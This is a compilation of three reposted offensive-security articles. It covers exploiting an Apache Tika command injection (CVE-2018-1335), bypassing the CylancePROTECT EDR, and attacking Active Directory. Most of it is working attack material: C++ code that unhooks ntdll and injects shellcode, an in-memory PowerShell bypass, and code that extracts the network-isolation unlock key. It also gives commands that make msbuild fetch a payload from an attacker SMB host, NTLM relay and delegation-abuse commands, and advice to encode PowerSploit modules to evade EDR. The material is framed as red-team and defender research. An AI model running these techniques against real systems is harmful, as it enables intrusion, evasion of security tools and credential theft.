maybe I could fill that file with some code or command and execute that. Now I had to find a native Windows application that will ignore all the random stray arguments created by tika-server and still execute the first files contents as some kind of command or code even though it has a “.tmp” extension. Finding something that would do all this sounded very unlikely to me at first. After clicking around https://github.com/api0cradle/LOLBAS for a while looking at LOLBins thinking maybe I could get lucky, I came across Cscript.exe and it looked somewhat promising. Let’s take a look at what Cscript can do. Cscript turned out to be just what was needed. It takes the first argument as a script and allows you to use the “//E:engine” flag to specify what script engine you want to use (this could be Jscript or VBS), so the file extension does not matter. Putting this into the new command would now look like the following. "cscript.exe"tesseract.exe C:\Users\Test\AppData\Local\Temp\apache-tika-3299124493942985299.tmp C:\Users\Test\AppData\Local\Temp\apache-tika-7317860646082338953.tmp -l //E:Jscript -psm 1 txt -c preserve_interword_spaces=0 This is done by setting the following HTTP headers: X-Tika-OCRTesseractPath: "cscript.exe" X-Tika-OCRLanguage: //E:Jscript The “image” file that will be uploaded will contain some Jscript or VBS: var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd /c calc.exe'); At first, uploading an image with those contents failed since it was not a valid image and it could not verify the magic bytes of the image. I then found that setting the content-type to “image/jp2” forces Tika to not check magic bytes in the image but still process the image through OCR. This allowed an image containing Jscript to be uploaded. Finally, putting all this together, we have full command/jscript/vbs execution. Conclusion What seemed to be a simple command injection bug turned out to have quite a few blockers to overcome in order to actually exploit it. It was interesting trying to come up with a method of getting around each hurdle. Although this was difficult to exploit it was still possible to do it and reiterates the point that you should never use untrusted input when constructing operating system commands. Apache does not suggest running the Tika-server in an untrusted environment or exposing it to untrusted users. This bug has also been patched and the current version is 1.20 so make sure you update if you are using this service. You can find the PoC in the Rhino Security Lab’s CVE repo: https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335 Sursa: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
  9. Silencing Cylance: A Case Study in Modern EDRs 12/03/2019 | Author: Admin As red teamers regularly operating against mature organisations, we frequently come in to contact with a variety of Endpoint Detection & Response solutions. To better our chances of success in these environments, we regularly analyse these solutions to identify gaps, bypasses and other opportunities to operate effectively. One of the solutions we regularly come across is CylancePROTECT, the EDR from Cylance Inc who were recently acquired by Blackberry in a reported $1.4 billion deal. In this blog post we will explore some of our findings that might assist red teamers operating in environments where CylancePROTECT is in place and briefly touch on CylanceOPTICS, a complementary solution that provides rule based detection to the endpoint. We also aim to provide defenders with insight in to how this solution operates so they have a better understanding of gaps that may exist and where complementary solutions can be introduced to mitigate risk. Cylance Overview CylancePROTECT (hereinafter also referred to as Cylance) functions on a device policy basis which is configurable through the Cylance SaaS portal; policies include the following security relevant configuration options: Memory Actions: control which memory protections are enabled including techniques for exploitation, process injection and escalation, Application Control: blocks new applications being run, Script Control: configuration to block Active Script (VBS and JS), PowerShell and Office macros, Device Control: configure access to removable media. During this case study, we will analyse the effectiveness of some of these controls and illustrate techniques that we found to bypass or disable them. All results are taken from CylancePROTECT agent version 2.0.1500; the latest version at the time of writing (Dec 2018). Script Control As noted, the script control feature of CylancePROTECT allows administrators to configure whether Windows Scripting, PowerShell and Office macros are blocked, permitted or allowed with alerting on the endpoint. A sample configuration may look as follows, which is configured to block all Script, PowerShell and macro files: In such a configuration, simple VBA macro enabled documents are disabled as per the policy; even relatively benign macros such as the following will be blocked: This will cause an event to be generated inside the Cylance dashboard similar to the following: While this is relatively effective at neutering VBA macros, we noted that Excel 4.0 macros are not accounted for and have relatively carte blanche access, as shown below: CylancePROTECT has no restrictions on Excel 4.0 macro enabled documents, even when macro documents are explicitly blocked by policy. Therefore these provide an effective means for obtaining initial access in a Cylance environment. Further details around weaponising Excel 4.0 macro enabled documents can be found in this excellent research by Stan Hegt. It should however be noted that other controls such as the memory protections (exploitation, injection and escalation) are however still in effect, although we’ll discuss those later on. Aside from macros, CylancePROTECT can also prevent the execution of Windows Script Host files, specifically VBScript and JavaScript files. As expected, attempting to run simple scripts with WScript.Shell inside a .js or .vbs file such as the following will be blocked by Cylance due to the ActiveScript protection: This will generate an error inside the Cylance dashboard such as: However, if we take the exact same JavaScript code and embed it inside a HTML Application such as the following: We can see that CylancePROTECT does not apply the same controls to any scripts that aren’t directly executed with wscript.exe, as shown below where the HTA spawned through mshta.exe runs without issue: Popping calc is all well and good, but let’s look at what happens if we try something more useful and weaponise a HTA using our SharpShooter tool: SharpShooter will generate a DotNetToJScript payload that executes the raw shellcode in-memory by first allocating memory for it with VirtualAlloc then get a function pointer to it and execute it, this is a fairly standard method of executing shellcode in .NET. On executing the HTA, an error is generated and the payload is blocked by Cylance, diving in to the dashboard there is little information on the cause, however it is almost certainly as a result of the memory protection controls which we will dive in to shortly: Disregarding shellcode execution for the moment (we’ll address that shortly), we already saw Cylance was quite nonchalant when we were executing calc.exe using either the macro or HTA payloads. Let’s see how it reacts if we try to download and run a Cobalt Strike beacon; the following HTA will simply use WScript to call certutil to download and execute a vanilla Cobalt Strike executable: As you can see if you’re operating in an environment with CylancePROTECT, you’ll probably want to bring your favourite application whitelisting bypasses to the party! Memory Protections Let’s now take a look at the memory protections. When analysing an endpoint security product’s memory protection, it is often useful to review just how that product detects the usage of often suspicious API’s such as CreateRemoteThread or WriteProcessMemory. In the case of Cylance, we know that memory analysis is exposed via several console options: If these protections are enabled, what we find is a DLL of CyMemdef.dll is injected into 32-bit processes, and CyMemDef64.dll for 64-bit. To understand the protection being employed, we can simulate a common malware memory injection technique leveraging CreateRemoteThread. A small POC was created with the following code: HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, false, procID); if (hProc == INVALID_HANDLE_VALUE) { printf("Error opening process ID %d\n", procID); return 1; } void *alloc = VirtualAllocEx(hProc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (alloc == NULL) { printf("Error allocating memory in remote process\n"); return 1; } if (WriteProcessMemory(hProc, alloc, shellcode, sizeof(shellcode), NULL) == 0) { printf("Error writing to remote process memory\n"); return 1; } HANDLE tRemote = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL); if (tRemote == INVALID_HANDLE_VALUE) { printf("Error starting remote thread\n"); return 1; } As expected, executing this code will result in Cylance detecting and terminating the process: Reviewing the Cylance injected DLL, we see that a number of hooks are placed within the process to detect the use of these kinds of suspicious functions. For example, placing a breakpoint at NtCreateThreadEx (which provides the syscall bridge for CreateRemoteThread) and invoking the API call, we see that the function has been modified with a JMP: Continuing execution via this JMP triggers an alert within Cylance and forces the termination of our application. Knowing this, we can simply modify the hooked instructions from our process to remove Cylance’s detection: #include <iostream> #include <windows.h> unsigned char buf[] = "SHELLCODE_GOES_HERE"; struct syscall_table { int osVersion; }; // Remove Cylance hook from DLL export void removeCylanceHook(const char *dll, const char *apiName, char code) { DWORD old, newOld; void *procAddress = GetProcAddress(LoadLibraryA(dll), apiName); printf("[*] Updating memory protection of %s!%s\n", dll, apiName); VirtualProtect(procAddress, 10, PAGE_EXECUTE_READWRITE, &old); printf("[*] Unhooking Cylance\n"); memcpy(procAddress, "\x4c\x8b\xd1\xb8", 4); *((char *)procAddress + 4) = code; VirtualProtect(procAddress, 10, old, &newOld); } int main(int argc, char **argv) { if (argc != 2) { printf("Usage: %s PID\n", argv[0]); return 2; } DWORD processID = atoi(argv[1]); HANDLE proc = OpenProcess(PROCESS_ALL_ACCESS, false, processID); if (proc == INVALID_HANDLE_VALUE) { printf("[!] Error: Could not open target process: %d\n", processID); return 1; } printf("[*] Opened target process %d\n", processID); printf("[*] Allocating memory in target process with VirtualAllocEx\n"); void *alloc = VirtualAllocEx(proc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (alloc == (void*)0) { printf("[!] Error: Could not allocate memory in target process\n"); return 1; } printf("[*] Allocated %d bytes at memory address %p\n", sizeof(buf), alloc); printf("[*] Attempting to write into victim process using WriteProcessMemory\n"); if (WriteProcessMemory(proc, alloc, buf, sizeof(buf), NULL) == 0) { printf("[!] Error: Could not write to target process memory\n"); return 1; } printf("[*] WriteProcessMemory successful\n"); // Remove the NTDLL.DLL hook added by userland DLL removeCylanceHook("ntdll.dll", "ZwCreateThreadEx", 0xBB); printf("[*] Attempting to spawn shellcode using CreateRemoteThread\n"); HANDLE createRemote = CreateRemoteThread(proc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL); printf("[*] Success :D\n"); } And after executing our POC, we can see that our shellcode is spawned without any alert: This form of self-policing will always be problematic as it depends on the process to detect its own bad behaviour. While we originally began work on this post back in November 2018, we must reference @fsx30 who has since publicly documented this issue and showed how it could be used in the context of dumping process memory. Application Control Another protection feature offered by Cylance is the option to disable a user’s ability to execute applications such as PowerShell. With this protection enabled, attempting to execute PowerShell will result in the following alert: We already know from the above analysis that DLL’s are injected into a process as a way of allowing Cylance to analyse and deploy preventative measures. Knowing this, the DLL CyMemDef64.dll was analysed to identify if this was also providing the above restriction. The first area of interesting functionality we see is a call to NtQueryInformationProcess which aims to determine the application’s executable name: Once recovered, this is compared to a string of PowerShell.exe: If we take the PowerShell.exe executable and rename this to PS.exe, we may expect to see this check bypassed… well not quite (believe us, this used to be the workaround for Cylance’s PowerShell protection before additional mitigations were added, long live Powercatz.exe). This indicates that there must be a further check being performed, which we find within the same function: Here we see a reference to a string “powershell.pdb” which is passed to a function to determine if this reference appears within the PE debug directory. If this is found to be the case, another DLL is then loaded into the PowerShell process of CyMemDefPS64.dll, which is a .NET assembly responsible for the message displayed above. So what if we were to modify the PowerShell executable’s PDB entry using something like a hex editor? Cool, so now we now know just how Cylance is blocking PowerShell execution, but modifying a binary in this way isn’t ideal given that the file hash will be changed, and any signatures will likely be invalidated. How can we achieve the same effect without modifying the hash of the PowerShell executable? Well one way would be to spawn the PowerShell process and attempt to modify the PDB reference in memory. To spawn PowerShell, we will use CreateProcess but with the flag CREATE_SUSPENDED. Once the suspended thread has been created, we will need to find the base address of the PowerShell PE in memory by locating the PEB structure. Then it is simply a case of traversing the PE file structure to modify the PDB reference before resuming execution. The code to do this looks like this: #include <iostream> #include <Windows.h> #include <winternl.h> typedef NTSTATUS (*NtQueryInformationProcess2)( IN HANDLE, IN PROCESSINFOCLASS, OUT PVOID, IN ULONG, OUT PULONG ); struct PdbInfo { DWORD Signature; BYTE Guid[16]; DWORD Age; char PdbFileName[1]; }; void* readProcessMemory(HANDLE process, void *address, DWORD bytes) { char *alloc = (char *)malloc(bytes); SIZE_T bytesRead; ReadProcessMemory(process, address, alloc, bytes, &bytesRead); return alloc; } void writeProcessMemory(HANDLE process, void *address, void *data, DWORD bytes) { SIZE_T bytesWritten; WriteProcessMemory(process, address, data, bytes, &bytesWritten); } void updatePdb(HANDLE process, char *base_pointer) { // This is where the MZ...blah header lives (the DOS header) IMAGE_DOS_HEADER* dos_header = (IMAGE_DOS_HEADER*)readProcessMemory(process, base_pointer, sizeof(IMAGE_DOS_HEADER)); // We want the PE header. IMAGE_FILE_HEADER* file_header = (IMAGE_FILE_HEADER*)readProcessMemory(process, (base_pointer + dos_header->e_lfanew + 4), sizeof(IMAGE_FILE_HEADER) + sizeof(IMAGE_OPTIONAL_HEADER)); // Straight after that is the optional header (which technically is optional, but in practice always there.) IMAGE_OPTIONAL_HEADER *opt_header = (IMAGE_OPTIONAL_HEADER *)((char *)file_header + sizeof(IMAGE_FILE_HEADER)); // Grab the debug data directory which has an indirection to its data IMAGE_DATA_DIRECTORY* dir = &opt_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_DEBUG]; // Convert that data to the right type. IMAGE_DEBUG_DIRECTORY* dbg_dir = (IMAGE_DEBUG_DIRECTORY*)readProcessMemory(process, (base_pointer + dir->VirtualAddress), dir->Size); // Check to see that the data has the right type if (IMAGE_DEBUG_TYPE_CODEVIEW == dbg_dir->Type) { PdbInfo* pdb_info = (PdbInfo*)readProcessMemory(process, (base_pointer + dbg_dir->AddressOfRawData), sizeof(PdbInfo) + 20); if (0 == memcmp(&pdb_info->Signature, "RSDS", 4)) { printf("[*] PDB Path Found To Be: %s\n", pdb_info->PdbFileName); // Update this value to bypass the check DWORD oldProt; VirtualProtectEx(process, base_pointer + dbg_dir->AddressOfRawData, 1000, PAGE_EXECUTE_READWRITE, &oldProt); writeProcessMemory(process, base_pointer + dbg_dir->AddressOfRawData + sizeof(PdbInfo), (void*)"xpn", 3); } } // Verify that the PDB path has now been updated PdbInfo* pdb2_info = (PdbInfo*)readProcessMemory(process, (base_pointer + dbg_dir->AddressOfRawData), sizeof(PdbInfo) + 20); printf("[*] PDB path is now: %s\n", pdb2_info->PdbFileName); } int main() { STARTUPINFOA si; PROCESS_INFORMATION pi; CONTEXT context; NtQueryInformationProcess2 ntpi; PROCESS_BASIC_INFORMATION pbi; DWORD retLen; SIZE_T bytesRead; PEB pebLocal; memset(&si, 0, sizeof(si)); memset(&pi, 0, sizeof(pi)); printf("Bypass Powershell restriction POC\n\n"); // Copy the exe to another location printf("[*] Copying Powershell.exe over to Tasks to avoid first check\n"); CopyFileA("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\Tasks\\ps.exe", false); // Start process but suspended printf("[*] Spawning Powershell process in suspended state\n"); CreateProcessA(NULL, (LPSTR)"C:\\Windows\\Tasks\\ps.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, "C:\\Windows\\System32\\", &si, &pi); // Get thread address context.ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS; GetThreadContext(pi.hThread, &context); // Resolve GS to linier address printf("[*] Querying process for PEB address\n"); ntpi = (NtQueryInformationProcess2)GetProcAddress(LoadLibraryA("ntdll.dll"), "NtQueryInformationProcess"); ntpi(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &retLen); ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &pebLocal, sizeof(PEB), &bytesRead); printf("[*] Base address of Powershell.exe found to be %p\n", pebLocal.Reserved3[1]); // Update the PDB path in memory to avoid triggering Cylance check printf("[*] Updating PEB in memory\n"); updatePdb(pi.hProcess, (char*)pebLocal.Reserved3[1]); // Finally, resume execution and spawn Powershell printf("[*] Finally, resuming thread... here comes Powershell :D\n"); ResumeThread(pi.hThread); } And when executed: Office Macro Bypass As discussed earlier, Office based VBA macro protection has been well implemented within Cylance (aside from the noted absence of Excel 4.0 support). If we reviewed the protection in detail, what we find is that a number of checks are added to the VBA runtime by implementing similar hooks as seen above. In this case however, the hooks are added to VBE7.dll which is responsible for exposing functionality such as Shell or CreateObject: What was found however was that, should the CreateObject call succeed, no further checks are completed on the exposed COM object. This means that should we find another way to initialise a target COM object, we can walk right past Cylance’s protection. One way to do this is to simply add a reference to the VBA project. For example, we can add a reference to “Windows Script Host Object Model”: This will then expose the “WshShell” object to our VBA, and gets us past the hooked CreateObject call. Once this is completed, we find that we can resume with the normal Office macro tricks: Bonus Round: CylanceOptics Isolation Bypass Although we didn’t focus too much on CylanceOptics, it would be a shame not to take a cursory look at one of the interesting features that it offers. A component of many EDR solutions is to provide the ability to isolate a host from the network if an analyst detects suspicious activity. In this event, should an attacker be using the host as an entry point into a network, it serves as an effective way to eliminate them from the network. CylanceOptics provides such a solution, exposing a Lockdown option via the web interface: Upon isolating a host, we find that an unlock key is provided: As having the ability to reconnect a previously isolated host would prove extremely valuable to us during an engagement, we wanted to understand just how difficult this would be for an attacker who had compromised a host and did not possess such an unlock key. The CylanceOptics assemblies were reviewed revealing an interesting obfuscated call to retrieve a registry value: We find that this call retrieves the value from HKEY_LOCAL_MACHINE\SOFTWARE\Cylance\Optics\PdbP. The value is then passed to the .NET DPAPI ProtectData.Unprotect API: Attempting to decrypt the registry value with the DPAPI master key for LOCAL SYSTEM results in a password being extracted. The code to show this can be found below: using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace CyOpticseUnlock { class Program { static void Main(string[] args) { var fixed = new byte[] { 0x78, 0x6A, 0x34, 0x37, 0x38, 0x53, 0x52, 0x4C, 0x43, 0x33, 0x2A, 0x46, 0x70, 0x66, 0x6B, 0x44, 0x24, 0x3D, 0x50, 0x76, 0x54, 0x65, 0x45, 0x38, 0x40, 0x78, 0x48, 0x55, 0x54, 0x75, 0x42, 0x3F, 0x7A, 0x38, 0x2B, 0x75, 0x21, 0x6E, 0x46, 0x44, 0x24, 0x6A, 0x59, 0x65, 0x4C, 0x62, 0x32, 0x40, 0x4C, 0x67, 0x54, 0x48, 0x6B, 0x51, 0x50, 0x35, 0x2D, 0x46, 0x6E, 0x4C, 0x44, 0x36, 0x61, 0x4D, 0x55, 0x4A, 0x74, 0x33, 0x7E }; Console.WriteLine("CyOptics - Grab Unlock Key\n"); Console.WriteLine("[*] Grabbing unlock key from HKEY_LOCAL_MACHINE\\SOFTWARE\\Cylance\\Optics\\PdbP"); byte[] PdbP = (byte[])Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Cylance\\Optics", "PdbP", new byte[] { }); Console.WriteLine("[*] Passing to DPAPI to unprotect"); var data = System.Security.Cryptography.ProtectedData.Unprotect(PdbP, fixed, System.Security.Cryptography.DataProtectionScope.CurrentUser); System.Console.WriteLine("[*] Success!! Key is: {0}", ASCIIEncoding.ASCII.GetString(data)); } } } Now we just need to pass this password over to CyOptics and we can resume network connectivity: After exploring this a bit further, what we actually found was that although we were able to retrieve the key, if you were to simply execute the CyOptics command as LOCAL SYSTEM, you are not required to provide a key, allowing the disabling of network lockdow by simply executing the command: CyOptics.exe control unlock -net This blog post was written by Adam Chester and Dominic Chell. Sursa: https://www.mdsec.co.uk/2019/03/silencing-cylance-a-case-study-in-modern-edrs/
  10. Penetration Testing Active Directory, Part II Hausec Infosec March 12, 2019 13 Minutes In the previous article, I obtained credentials to the domain three different ways. For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation. Privilege escalation in Windows can of course come from a missing patch or unquoted service paths, but since this is pentesting AD, we’re going to exploit some AD things in order to elevate privileges. With credentials to the network we now should do a little recon before we directly look to missing patch exploits. There’s a few tools and techniques that will help. Phase II: Privilege Escalation & Reconnaissance “Time spent on reconnaissance is seldom wasted.” – Arthur Wellesley Tool: Bloodhound One of my favorite tools is Bloodhound. Attackers think in graphs, so Bloodhound is an excellent tool because it literally maps out the domain in a graph, revealing relationships that are both intended and not intended. From an attacker perspective, this is interesting because it shows us targets. I wrote a whole thing on Bloodhound, which can be read here, but I’ll show a tl;dr version. Let’s assume you don’t have a session opened on a machine, but you have credentials. You can still use Bloodhound’s Python ingestor and remotely gather the data. It can in be installed via git git clone https://github.com/fox-it/BloodHound.py.git cd BloodHound.py/ && pip install . Then can be ran by passing in the credentials, domain, and DC IP bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all Once BH does it’s thing, it will store the data in the directory you ran it in, in .json format. Copy those files, then drag them into Bloodhound and you now have a pretty graph of the network. If you sort by “Shortest path to domain admin” you’ll get something similar to below AdminAlice is logged into a DC. The power of this is that you can directly see what administrators are logged into what machines, giving you a next target. In a domain of hundreds or maybe even thousands of machines that will accept low-privilege credentials, you don’t want to waste time by just gathering other low-priv creds. This gives a target list, among many other things. Other uses can include identifying SQL servers that might have databases containing credentials, identifying what machines can be RDP’d into, and so much more. I encourage you to read more about it’s capabilities in depth here. I also encourage you to look at GoFetch, which automatically utilizes an attack plan drawn out by Bloodhound. Attack: Kerberoasting | Tool: GetUserSPNs.py With a target list and a domain controller identified, one way of privilege escalation is Kerberoasting. Kerberoasting is possible because service accounts are issued a Service Principal Name (SPN) within AD. It is possible then for any user to request a Kerberos ticket from the SPN, which has that accounts hashed password (In Kerberos 5 TGS-REP format). There are many different tools that can do Kerberoasting, but really you only need one tool. GetUserSPNs.py is pretty self explanatory — it queries the target domain for SPNs that are running under a user account. Using it is pretty simple. And now we have the hash to a service account. I load it into hashcat (GUI, of course) and select hash type 13100, as highlighted below And it cracks within a few seconds We now have the credentials to a service account, which usually results in access to the domain controller. Too easy? Let’s try other ways. Attack: ASEPRoasting | Tool: Rubeus ASEPRoasting is similar to Kerberoasting in the sense that we query accounts for TGTs, get the hash, then crack it, however in the case of ASEPRoasting there’s a very big caveat: Kerberos pre-authentication must be disabled, which is not a default setting. When you request a TGT, via a Kerberos AS-REQ message, you also supply a timestamp that is encrypted with your username and password. The Key Distribution center (KDC) then decrypts the timestamp, verifies the request is coming from that user, then continues with the authentication process. This is the pre-authentication process for Kerberos, which is obviously a problem for an attacker because we aren’t the KDC and cannot decrypt that message. Of course, this is by design, to prevent attacks, however if pre-authentication is turned off, we can send an AS-REQ to any user which will return their hashed password in return. Since pre-auth is enabled by default, it has to be manually turned off, so this is rare, however still worth mentioning. tsmith is susceptible to ASREPRoasting because ‘Do not require Kerberos preauthentication’ is checked. To exploit this, we’ll use a tool called Rubeus. Rubeus is a massive toolset for abusing Kerberos, but for conducting ASREPRoasting, we care about this section. To use Rubeus, you first need to install Visual Studio. Once installed, download Rubeus and open the Rubeus.sln file with Visual studio. By default, it will install in the Rubeus\bin\Debug\ file. cd into that directory, then run it: .\Rubeus.exe asreproast If no users have ‘Do not require Kerberos preauthentication’ checked, then there won’t be any users to roast. But if there is… We then can get the hash for the user and crack it. Keep in mind that the examples were done on a computer already joined to the domain, so if you were doing this from a computer not on the domain, you would have to pass in the domain controller, domain name, OUs, etc. Tool: SILENTTRINITY SILENTTRINITY is a new Command and Control (C2) tool developed by @byt3bl33d3r which utilizes IronPython and C#. You have the option to use MSBuild.exe, a Windows binary which builds C# code (which is also installed by default with Windows 10, as part of .NET) to run a command & control (C2) payload in an XML format, allowing the attacker to then use the underlying .NET framework to do as they please on the victim’s machine via IronPython, C#, and other languages. Personally, SILENTTRINITY has replaced Empire in my toolkit and I wrote a guide on how to use it here. There’s still select areas where I’d prefer to have an Empire connection, but ST is also in an ‘alpha’ state, so that functionality will come. There’s three main reasons why ST has replaced Empire, in my opinion. Empire payloads are now being caught by Windows Defender, even when obfuscated (there’s ways around it, but still.) ST lives off the land You can elevate to SYSTEM privileges when executing the payload over CME with the –at-exec switch. Below is a PoC in a fresh Windows 10 install, using a non-Domain Admin user’s credentials Account “tsmith” is only in the user’s group Code execution with tsmith’s credentials I generate the XML payload in SILENTTRINITY, then host it on my SMB server via smbserver.py. If you’re confused on how to do that, follow my guide here. I then use CME to execute the command that will fetch the XML file on my attacker machine. crackmapexec 192.168.218.60 -u tsmith -p Password! -d lab.local -x 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe \\192.168.218.129\SMB\msbuild.xml' --exec-method atexec CME executes the supplied command, which runs msbuild.exe and tells it to build the XML file hosted on my SMB server I now have a session opened in ST And listing the info for the session reveals my username is SYSTEM, meaning I escalated from user tsmith to SYSTEM, due to the fact that MSBuild.exe ran with the –exec-method atexec option, which uses Task Scheduler with SYSTEM privileges (or whatever the highest possible it) to run the command. And of course, we then dump credentials and now have an administrator password hash which we can pass or crack. Attack: PrivExchange PrivExchange is a new technique (within the past month) that takes advantage of the fact that Exchange servers are over-permissioned by default. This was discovered by Dirkjann a little over a month ago and is now an excellent way of quickly escalating privileges. It works by querying the Exchange server, getting a response back that contains the Exchange server’s credentials, then relaying the credentials in the response to the Domain Controller via ntlmrelayx, then modifying a user’s privileges so they can dump the hashes on the domain controller. Setting this up was kind of a pain. Exchange 2013 is installed using the default methods on a Windows 2012 R2 server, and I made this modification to the PrivExchange python script to get it to work without a valid SSL certificate. After that, it ran fine. First, start ntlmrelayx.py and point it to a DC, authenticate via LDAP and escalate privileges for a user. ntlmrelayx.py -t ldap://192.168.218.10 --escalate-user rsmith Then, run privexchange.py by passing in your attacker IP (-ah), the target, and user/password/domain. python privexchange.py -ah 192.168.218.129 LAB2012DC02.lab.local -u rsmith -d lab.local -p Winter201 Privexchange.py makes the API call to the echange ntlmrelayx relays the Exchange server’s credentials to the Master DC, then escalates rsmith’s privileges Using rsmith’s privileges to dump the hashes on the DC. With the hashes to all users, they can now be cracked. Side note: If you ever run Mimikatz and it gets caught by AV, secretsdump.py is an excellent alternative, as it doesn’t drop anything to disk. Attack: Kerberos Unconstrained Delegation Also from Dirk-jan, is an attack that takes advantage of default AD installs. Specifically, the fact that computers can, by default, change some attributes relating to their permissions such as msDS-AllowedToActOnBehalfOfOtherIdentity. This attribute controls whether users can login to (almost) any computer on the domain via Kerberos impersonation. This is all possible through relaying credentials. I’ve demonstrated mitm6 in part one, so I’ll use it again here, but relay the responses in a different way. mitm6 -i ens33 -d lab.local I then serve the WPAD file and relay the credentials over LDAPS to the primary DC while choosing the delegate access attack method. ntlmrelayx.py -t ldaps://LAB2012DC01.lab.local -wh 192.168.10.100 --delegate-access The victim opens IE, which sends out a WPAD request over IPv6, which the attacker (me) responds to and relays those credentials to the DC over LDAPS. A new computer is created and the delegation rights are modified so that the new ‘computer’ can impersonate any user on LABWIN10 (the victim) via the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. So I now generate a silver ticket and impersonate the user ‘Administrator’. getST.py -spn cifs/LABWIN10.lab.local lab.local/AFWMZ0DS\$ -dc-ip 192.168.10.10 -impersonate Administrator I then logon to LABWIN10 with my silver ticket via secretsdump.py and dump the credentials. To read more on silver ticket attacks and how they work, this is a good article. Attack: Resource-based Constrained Delegation Yes, more attacks due to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. @harmj0y made a post a few weeks ago on this. Essentially, if you’re able to change a computer object in AD, you can take over the computer itself. The only catch to this is there needs to be one 2012+ domain controller, as older versions do not support resource-based constrained delegation (RBCD). Elad Shamir breaks the entire attack down, including more about RBCD, in this article. There’s three tools used for this: Powermad Powerview Rubeus This attack is then conducted on the Windows 10 machine with rsmith’s credentials. First, we set the executionpolicy to bypass so we can import and run scripts. Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser Then we check to see if we can modify discretionary access control lists (DACLs). $AttackerSID = Get-DomainGroup Users -Properties objectsid | Select -Expand objectsid Get-DomainObjectACL LAB2012DC01.lab.local | ?{$_.SecurityIdentifier -match $AttackerSID} The above commands look up rights for the ‘Users’ SID, showing that the group has ‘Generate Write’ permissions on the object (the DC). By default, this isn’t exploitable. This is abusing a potential misconfiguration an Administrator made; in this example it is the fact that the Admin added the “Users” group as a principal to the DC and allowed the GenericWrite attribute. As a PoC, rsmith (who is in the “Users” group), cannot get into the DC. What we do next is create a new computer account and modify the property on the domain controller to allow the new computer account to pretend to be anyone to the domain controller, all thanks to the msDS-allowedToActOnBehalfOfOtherIdentity. It’s possible for us to create a new computer account, because by default a user is allowed to create up to 10 machine accounts. Powermad has a function for it New-MachineAccount -MachineAccount hackermachine -Password $(ConvertTo-SecureString 'Spring2017' -AsPlainText -Force) We then add the new machine’s SID to the msDS-allowedToActOnBehalfOfOtherIdentity attribute on the DC. $ComputerSid = Get-DomainComputer hackermachine -Properties objectsid | Select -Expand objectsid $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte $SD.GetBinaryForm($SDBytes, 0) Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} Then use Rubeus to get the NT password for our created machine. .\Rubeus.exe hash /password:Spring2017 /user:hackermachine /domain:lab.local Finally, we then impersonate a domain administrator (Administrator) using Rubeus’ service for user (S4U) process on the target DC. .\Rubeus.exe s4u /user:hackermachine$ /rc4:9EFAFD86A2791ED001085B4F878AF381 /impersonateuser:Administrator /msdsspn:cifs/LAB2012DC01.lab.local /ptt With the ticket imported, we can then access the domain controller. Again, this is leveraging the fact that the system administrator dun goofed and added the ‘Users’ group to have Generic_Write access to the DC. Even though we couldn’t access it via SMB, we modified the permissions that would allow us to. If you’re still confused, here’s a video from SpecterOps demonstrating a walkthrough. Attack: MS14-025, GPP This one is less common as it’s been out for quite some time, however it gets a mention because it still does exist. MS14-025 is also known as the group policy preferences escalation vulnerability. When a Domain Administrator would push out a local administrator account via Group Policy Preferences, it would store the encrypted credentials in the SYSVOL share on the domain controller (SYSVOL is accessible by anyone, as it’s where policies are stored and other things domain clients need to access). This typically wouldn’t be a problem because it’s encrypted with AES encryption, right? Well, Microsoft dun goofed and published the decryption key. So now, attackers can decode the password. To simplify things, Metasploit has an auxiliary module for this. Attack: Finding over privileged accounts | Tool: CrackMapExec Ok, this one isn’t necessarily an “attack” as much as it is a methodology of doing good reconnaissance and enumeration, which a few tools can help out with. This seems like kinda of a stretch from an article standpoint, but in reality over privileged accounts are so incredibly common, that it’s not unusual to find one persons accounts then log into another persons workstation and have read access to their stuff. In addition, having privileges to servers where that user should have no business accessing, which of course leads to the attacker just dumping credentials everywhere and eventually finding creds that work on the domain controller. The methodology here is pretty easy: Spray the credentials across the network, see what you can log into. With crackmapexec, you can list the shares and see what you have write access to. crackmapexec 192.168.218.0/24 -u rsmith -p Winter2017 --shares From here, use SILENTTRINITY to get a session open on what the user has write access to, run the mimikatz module, and hope you find new credentials that are privileged. Remember, you can use CME with CIDRs, meaning if you’re using SILENTTRINITY as your C2 server and using CME to trigger the connection, you can spray that across the network for maximum sessions. Although it’s not very OpSec friendly and quite noisy. Consider it a test to see how their detection and response posture is Tools: PowerTools Suite Attack 1: Finding passwords in files. Another thing to look for is passwords in files. There’s been several occasions where I find a user is storing emails in their Documents folder, which contains a password. Or they keep an Excel/Word file with passwords in it. This is where the PowerSploit suite comes in handy. Where do I begin with the PowerSploit suite…basically if you want to do something malicious, there’s a Powershell module for it. In the case of searching for passwords, or any string for that matter, PowerView is your friend. Keep in mind EDRs catch basically every module in this suite, so I suggest encoding them 